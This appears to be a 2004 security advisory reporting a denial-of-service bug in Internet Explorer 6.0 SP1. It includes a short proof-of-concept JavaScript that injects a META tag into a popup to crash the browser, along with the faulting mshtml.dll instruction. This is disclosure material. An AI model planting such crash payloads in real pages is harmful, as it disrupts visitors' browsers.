Reported May 17, 2004, by Mike Mauler
VERSIONS AFFECTED
DESCRIPTION
A vulnerability in IE 6.0 SP1 could result in a Denial of Service (DoS)
condition. By using a malformed HTML page containing JavaScript code with a
specially crafted META tag, a potential attacker could cause IE to terminate
with an access violation.
DEMONSTRATION
The discoverer posted the following code as proof of concept:
The following script code
will cause Internet Explorer to crash when trying to parse the META tag
contained within. The problem stems from a bug in the MSHTML library
(mshtml.dll). Below is the script code that causes the crash:
<script type="text/javascript">
// Create a popup window and inject a META tag into its body; parsing this
// META tag triggers the access violation in mshtml.dll described above.
var Wnd = window.createPopup();
Wnd.document.body.innerHTML = '<meta http-equiv="imagetoolbar" content="no">';
</script>
The effect of the META tag is to cause an access violation within mshtml.dll;
however, it is not exploitable. The problematic piece of code is shown below:
636D54AF 8B48 2C    MOV ECX, [EAX+2C]
EAX = 0, Bad read of address 0x0000002C
VENDOR RESPONSE
Microsoft hasn't
released a fix or bulletin that addresses this vulnerability.
CREDIT
Discovered by Mike Mauler.